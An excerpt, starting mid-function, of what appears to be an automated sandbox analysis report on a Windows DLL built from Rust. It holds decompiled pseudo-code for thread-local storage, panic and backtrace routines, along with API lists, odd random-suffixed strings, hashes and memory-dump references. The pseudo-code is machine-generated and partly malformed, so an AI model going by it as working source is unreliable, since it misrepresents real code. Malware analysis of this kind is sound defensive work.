						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6eadd044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6eadd044;
							_t202 = E6EA92960(_t264, 0x6eadd044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6eadd044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6eadd044;
								_t203 = E6EA92960(_t264, 0x6eadd044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6eade128; // 0x2d40000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6eadd044;
										_t332 = _t205;
										_t206 =  *0x6eadd044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6EA92960(_t264, 0x6eadd044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6EAA92F0(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6eade128, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6eade110;
											 *0x6eade110 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ea93290
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6eade128 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6EA8C640(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6EAA95A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6eacf860, 0x6eacff30);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6EA8C4D0(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6EA8C640(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ead010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ea8dca0;
										_v60 =  &_v100;
										_v56 = 0x6ea8dca0;
										_v52 =  &_v148;
										_v48 = E6EA8DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6EA8D0F0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6eade128, 0, _t245);
											}
											HeapFree( *0x6eade128, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6eade10c);
											_v68 = 0x6eacfad0;
											_v64 = 1;
											_v152 = 0x6eade10c;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6EA8DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6EA8D0F0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6eade10c);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6EA8C640(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6EA8DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6eade11c);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ead029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6eacf570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6EA8D0F0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6EA8D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6EA8D290(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6eadd040 = 0;
											_t356 =  *0x6eadd040;
											if( *0x6eadd040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ead017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6eacf570;
											_v48 = 0;
											_v20 = 3;
											if(E6EA8D0F0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6eade128, 0, _t235);
											}
											HeapFree( *0x6eade128, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

0x6ea8c70c
0x6ea8c70f
0x6ea8c716
0x6ea8c71d
0x6ea8c722
0x6ea8c727
0x6ea8c730
0x6ea8c733
0x6ea8c739
0x6ea8c741
0x6ea8c746
0x6ea8c748
0x6ea8c762
0x6ea8c767
0x6ea8c76a
0x6ea8c76a
0x6ea8c76e
0x6ea8c771
0x6ea8c774
0x6ea8c776
0x6ea8c7ea
0x6ea8c7ed
0x6ea8c84a
0x6ea8c851
0x6ea8c85b
0x6ea8c862
0x6ea8c869
0x6ea8c86d
0x6ea8c874
0x6ea8c87b
0x6ea8c881
0x6ea8c884
0x6ea8c887
0x6ea8c88d
0x6ea8c894
0x6ea8c897
0x6ea8c89e
0x6ea8c8a3
0x6ea8c8a5
0x6ea8c8ac
0x6ea8c8b4
0x6ea8c8b7
0x6ea8c8b9
0x6ea8c8bc
0x6ea8c8bc
0x6ea8c8bf
0x6ea8c8c2
0x6ea8c8c6
0x6ea8c8c8
0x6ea8c8ca
0x6ea8c8ce
0x6ea8c8d0
0x6ea8c8d0
0x6ea8c8dc
0x6ea8c8dc
0x6ea8c8ea
0x6ea8c8ea
0x00000000
0x6ea8c8a5
0x6ea8c7f2
0x6ea8c7f5
0x6ea8c7fc
0x6ea8c803
0x6ea8c80a
0x6ea8c811
0x6ea8c815
0x6ea8c81c
0x6ea8c823
0x6ea8c828
0x6ea8c82a
0x00000000
0x6ea8c830
0x6ea8c835
0x6ea8c83d
0x6ea8c840
0x6ea8c842
0x00000000
0x6ea8c842
0x6ea8c77d
0x6ea8c77d
0x6ea8c785
0x6ea8c78b
0x6ea8c795
0x6ea8c79c
0x6ea8c7a3
0x6ea8c7a9
0x6ea8c7ac
0x6ea8c7af
0x6ea8c7b2
0x6ea8c7b5
0x6ea8c7ba
0x6ea8c7bd
0x6ea8c7bf
0x6ea8c8f3
0x6ea8c8f3
0x6ea8c8f6
0x6ea8c8f8
0x6ea8c9cb
0x6ea8c9d0
0x6ea8c9d3
0x6ea8c9d6
0x6ea8cbd7
0x00000000
0x6ea8cbd7
0x6ea8c9dc
0x6ea8c9df
0x6ea8cbd0
0x00000000
0x6ea8cbd0
0x6ea8c9e5
0x6ea8c9e7
0x00000000
0x00000000
0x6ea8c9f0
0x6ea8c9f5
0x6ea8c9f8
0x6ea8c9fb
0x6ea8c9fd
0x00000000
0x00000000
0x6ea8ca03
0x00000000
0x6ea8ca03
0x6ea8c8fe
0x00000000
0x6ea8c7c5
0x6ea8c7dd
0x6ea8c7e2
0x6ea8cbfe
0x6ea8cbfe
0x6ea8cc00
0x6ea8cc00
0x6ea8cc05
0x6ea8c933
0x6ea8c933
0x6ea8c936
0x6ea8c939
0x6ea8c940
0x6ea8c942
0x6ea8c947
0x6ea8c947
0x6ea8c94d
0x6ea8c956
0x6ea8ca33
0x6ea8ca33
0x6ea8ca38
0x6ea8ca3a
0x6ea8ca3c
0x6ea8ca41
0x6ea8ca41
0x6ea8ca47
0x6ea8ca4d
0x6ea8ca4f
0x6ea8cc0f
0x6ea8cc14
0x6ea8cc16
0x6ea8cc26
0x6ea8cc2b
0x6ea8cc30
0x6ea8cc32
0x6ea8cc72
0x6ea8cc78
0x6ea8cc7f
0x6ea8cc81
0x6ea8cc86
0x6ea8cc88
0x6ea8cc8f
0x6ea8cc92
0x6ea8cc97
0x6ea8cc97
0x6ea8cc9c
0x00000000
0x6ea8cc9c
0x6ea8cc34
0x6ea8cc3e
0x6ea8cc43
0x6ea8cc45
0x6ea8cc45
0x6ea8cc48
0x6ea8cc4b
0x6ea8cc4e
0x6ea8ccf8
0x6ea8ccfe
0x6ea8cd09
0x6ea8cd09
0x6ea8cd0e
0x6ea8cd0e
0x6ea8cd10
0x6ea8cd10
0x6ea8cd12
0x6ea8cd1d
0x6ea8cd1d
0x6ea8cd22
0x6ea8cd22
0x6ea8cd2d
0x6ea8cd35
0x6ea8cd38
0x6ea8cd3b
0x6ea8cd3b
0x6ea8cd3b
0x6ea8c901
0x6ea8c901
0x6ea8c907
0x6ea8c90a
0x6ea8c90a
0x6ea8c910
0x6ea8c913
0x6ea8c915
0x6ea8c923
0x6ea8c923
0x6ea8c925
0x6ea8ca0d
0x6ea8ca10
0x6ea8ca1e
0x6ea8ca20
0x00000000
0x00000000
0x6ea8ca26
0x6ea8ca29
0x6ea8ca2b
0x00000000
0x6ea8ca2b
0x6ea8c92b
0x6ea8c92e
0x6ea8c930
0x00000000
0x6ea8c930
0x6ea8cd00
0x6ea8cd02
0x00000000
0x6ea8cd02
0x6ea8cc54
0x6ea8cc57
0x00000000
0x00000000
0x6ea8cc5d
0x6ea8cc60
0x00000000
0x00000000
0x6ea8cc66
0x6ea8cc68
0x00000000
0x6ea8cc68
0x6ea8cc18
0x6ea8cc1d
0x6ea8cc1f
0x00000000
0x00000000
0x6ea8cc21
0x00000000
0x6ea8ca55
0x6ea8ca55
0x6ea8ca57
0x6ea8ca5a
0x6ea8cca2
0x6ea8cca2
0x6ea8cca5
0x6ea8cca8
0x6ea8cca8
0x6ea8ccab
0x6ea8ccb1
0x6ea8ccb8
0x6ea8ccbf
0x6ea8ccc5
0x6ea8ccc7
0x6ea8cccd
0x6ea8ccd0
0x6ea8ccd6
0x6ea8ccd6
0x6ea8ccd0
0x6ea8ccc7
0x00000000
0x6ea8ccbf
0x6ea8ca60
0x6ea8ca67
0x6ea8ca6e
0x6ea8ca6e
0x00000000
0x6ea8ca6e
0x6ea8c95c
0x6ea8c95f
0x6ea8c961
0x00000000
0x00000000
0x6ea8c967
0x6ea8c96a
0x6ea8c96d
0x6ea8cbf6
0x6ea8cbfb
0x00000000
0x6ea8cbfb
0x6ea8c973
0x6ea8c979
0x6ea8c97e
0x6ea8c980
0x6ea8c983
0x6ea8c98a
0x6ea8c98f
0x6ea8c992
0x6ea8c994
0x6ea8c997
0x6ea8c999
0x6ea8c99b
0x6ea8c99e
0x6ea8c9a0
0x6ea8c9a3
0x6ea8c9a3
0x6ea8c99e
0x6ea8c9a8
0x6ea8c9a8
0x6ea8c9ab
0x6ea8c9ae
0x6ea8c8ef
0x6ea8c8ef
0x6ea8c8f1
0x00000000
0x6ea8c9b4
0x6ea8c9b4
0x6ea8c9b8
0x6ea8c9bb
0x6ea8c9be
0x6ea8cce0
0x6ea8cce6
0x6ea8cce8
0x6ea8cceb
0x6ea8cea2
0x6ea8cea2
0x6ea8cea7
0x6ea8cea8
0x6ea8cea8
0x6ea8ca70
0x6ea8ca77
0x6ea8ca7e
0x6ea8ca85
0x6ea8ca8c
0x6ea8ca90
0x6ea8ca97
0x6ea8ca9e
0x6ea8caa5
0x6ea8caad
0x6ea8cab0
0x6ea8cab6
0x6ea8cab9
0x6ea8cabf
0x6ea8cac5
0x6ea8cacc
0x6ea8cad5
0x6ea8cadc
0x6ea8cae2
0x6ea8cae9
0x6ea8caec
0x6ea8cafa
0x6ea8cb01
0x6ea8cb09
0x6ea8cb0c
0x6ea8cb0e
0x6ea8cb11
0x6ea8cb14
0x6ea8cb1b
0x6ea8cb1d
0x6ea8cb23
0x6ea8cb25
0x6ea8cb25
0x6ea8cb31
0x6ea8cb31
0x6ea8cb3f
0x6ea8cb3f
0x6ea8cb44
0x6ea8cb55
0x6ea8cb5a
0x6ea8cd4b
0x6ea8cd5a
0x6ea8cd61
0x6ea8cd68
0x6ea8cd72
0x6ea8cd75
0x6ea8cd7c
0x6ea8cd83
0x6ea8cd89
0x6ea8cd90
0x6ea8cd93
0x6ea8cd9a
0x6ea8cd9f
0x6ea8cda8
0x6ea8cdae
0x6ea8cdb1
0x00000000
0x00000000
0x6ea8cdb8
0x6ea8cdc0
0x6ea8cdc3
0x6ea8cdc5
0x00000000
0x6ea8cb60
0x6ea8cb63
0x6ea8ce00
0x6ea8ce03
0x6ea8ce05
0x6ea8ce07
0x6ea8ce0a
0x6ea8ce0f
0x6ea8ce0f
0x6ea8ce0a
0x6ea8ce17
0x6ea8ce1d
0x6ea8ce23
0x6ea8ce25
0x6ea8ce27
0x6ea8ce2a
0x6ea8ce2f
0x6ea8ce2f
0x6ea8ce2a
0x6ea8ce39
0x6ea8ce3f
0x6ea8ce43
0x6ea8ce4a
0x6ea8ce52
0x6ea8ce59
0x6ea8ce60
0x6ea8ce67
0x6ea8ce6e
0x6ea8ce72
0x6ea8ce79
0x6ea8ce80
0x6ea8ce88
0x6ea8ce8b
0x6ea8ce8e
0x6ea8ce93
0x6ea8ce95
0x6ea8ce95
0x6ea8ce97
0x6ea8ce9b
0x6ea8cea0
0x00000000
0x6ea8cea0
0x6ea8cb6b
0x6ea8cb71
0x6ea8cb73
0x00000000
0x00000000
0x6ea8cb7c
0x6ea8cb7f
0x6ea8cb86
0x6ea8cb8d
0x6ea8cb94
0x6ea8cb9b
0x6ea8cba2
0x6ea8cbb0
0x00000000
0x00000000
0x6ea8cbbb
0x6ea8cbbe
0x6ea8cbc6
0x6ea8cbc8
0x6ea8cdc8
0x6ea8cdcb
0x6ea8cdd2
0x6ea8cddb
0x6ea8cddd
0x6ea8cddf
0x6ea8cddf
0x6ea8cdeb
0x6ea8cdeb
0x6ea8cdfb
0x00000000
0x6ea8cdfb
0x6ea8cb5a
0x6ea8ccf1
0x00000000
0x6ea8ccf1
0x6ea8c9c4
0x00000000
0x6ea8c9c4
0x6ea8c9ae
0x6ea8c956
0x6ea8c7bf

APIs

Part of subcall function 6EA8D000: TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D00B
Part of subcall function 6EA8D000: TlsGetValue.KERNEL32(00000000), ref: 6EA8D043

AcquireSRWLockShared.KERNEL32(6EADE11C), ref: 6EA8C785
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8C8DC
HeapFree.KERNEL32(00000000,?), ref: 6EA8C8EA
TlsGetValue.KERNEL32(00000000), ref: 6EA8C94D
TlsGetValue.KERNEL32(00000000), ref: 6EA8CA47
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8CB31
HeapFree.KERNEL32(00000000,?), ref: 6EA8CB3F
GetProcessHeap.KERNEL32 ref: 6EA8CC18
HeapAlloc.KERNEL32(02D40000,00000000,00000010), ref: 6EA8CC2B
TlsSetValue.KERNEL32(00000000,00000000,02D40000,00000000,00000010), ref: 6EA8CC9C
HeapFree.KERNEL32(00000000,00000000,02D40000,00000000,00000010), ref: 6EA8CD1D

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6EA8CC00
full, xrefs: 6EA8CCF8
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6EA8C74D, 6EA8C7C8
already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6EA8CBE1

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: 3c33ad3bcbf520c790ed78dcda1a5faa3301f8fabdee2f2c995756da606a7bdf
Instruction ID: 1d2dedecf9fa869aa15dd49f90efbb8f0a7120b29440f1a887ba14f21fe86c50
Opcode Fuzzy Hash: 3c33ad3bcbf520c790ed78dcda1a5faa3301f8fabdee2f2c995756da606a7bdf
Instruction Fuzzy Hash: DF1247B0E00219CFEB10CFE4C954B8EBBB5BF49304F248669D415AF240D775A886CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8E4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6EA8E4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6EA939F0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6eade124; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6eade124], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6eade130; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6eade164 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6eade134; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6eade138; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6eade13c; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6eade164 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6eade130, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6EAA94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ead04bc);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6eade13c = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6eade130, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6EAA94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ead04ac);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6eade138 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6EAA94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ead049c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6EA8E6D0(_v36);
								} else {
									_t38 = _t30;
									 *0x6eade134 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6eade130 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

0x6ea8e4e0
0x6ea8e4e4
0x6ea8e4e9
0x6ea8e4ec
0x6ea8e4f3
0x6ea8e504
0x6ea8e507
0x6ea8e50d
0x6ea8e515
0x6ea8e5f5
0x6ea8e5fa
0x6ea8e5fc
0x6ea8e620
0x00000000
0x6ea8e5fe
0x6ea8e5fe
0x6ea8e600
0x6ea8e602
0x6ea8e60a
0x6ea8e613
0x6ea8e619
0x6ea8e619
0x00000000
0x6ea8e60a
0x6ea8e51b
0x6ea8e51b
0x6ea8e520
0x6ea8e525
0x6ea8e52c
0x6ea8e545
0x6ea8e545
0x6ea8e54e
0x00000000
0x6ea8e554
0x6ea8e554
0x6ea8e55c
0x6ea8e579
0x6ea8e579
0x6ea8e57b
0x6ea8e581
0x6ea8e585
0x6ea8e5a7
0x6ea8e5ab
0x6ea8e5ad
0x6ea8e5b5
0x6ea8e5d7
0x6ea8e5d7
0x6ea8e5e1
0x6ea8e5e3
0x00000000
0x6ea8e5b7
0x6ea8e5c2
0x6ea8e5ca
0x6ea8e68d
0x6ea8e690
0x6ea8e6a6
0x00000000
0x6ea8e5d0
0x6ea8e5d0
0x6ea8e5d2
0x00000000
0x6ea8e5d2
0x6ea8e5ca
0x6ea8e587
0x6ea8e592
0x6ea8e59a
0x6ea8e66a
0x6ea8e66d
0x6ea8e683
0x00000000
0x6ea8e5a0
0x6ea8e5a0
0x6ea8e5a2
0x00000000
0x6ea8e5a2
0x6ea8e59a
0x6ea8e55e
0x6ea8e564
0x6ea8e56c
0x6ea8e647
0x6ea8e64a
0x6ea8e660
0x6ea8e6ae
0x6ea8e6ae
0x6ea8e6b4
0x6ea8e6c3
0x6ea8e572
0x6ea8e572
0x6ea8e574
0x00000000
0x6ea8e574
0x6ea8e56c
0x6ea8e55c
0x6ea8e52e
0x6ea8e533
0x6ea8e53a
0x6ea8e53f
0x6ea8e628
0x6ea8e62d
0x6ea8e632
0x6ea8e637
0x6ea8e646
0x00000000
0x00000000
0x00000000
0x6ea8e53f
0x6ea8e52c

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6EA8E564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6EA8E592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6EA8E5C2
GetCurrentProcess.KERNEL32 ref: 6EA8E5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E613

Part of subcall function 6EA8E6D0: ReleaseMutex.KERNEL32(?,6EA8E448), ref: 6EA8E6D1

Strings

Local\RustBacktraceMutex, xrefs: 6EA8E5EC
SymGetOptions, xrefs: 6EA8E55E
SymSetOptions, xrefs: 6EA8E587
called `Option::unwrap()` on a `None` value, xrefs: 6EA8E651, 6EA8E674, 6EA8E697
dbghelp.dll, xrefs: 6EA8E52E
SymInitializeW, xrefs: 6EA8E5B7

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: 013d2d7f676c598f9497f55e13288b2a9d27645979fa3c546e31ad9ca47c6847
Instruction ID: 7cce8dc11ef11f84a0475d1d8fc5289afb8f90d8f629dac2f8570f8284348b75
Opcode Fuzzy Hash: 013d2d7f676c598f9497f55e13288b2a9d27645979fa3c546e31ad9ca47c6847
Instruction Fuzzy Hash: 3241E371F407419BEF109FE88D5479BB6E9BB45714F00C43DE405AB380EB349886876A
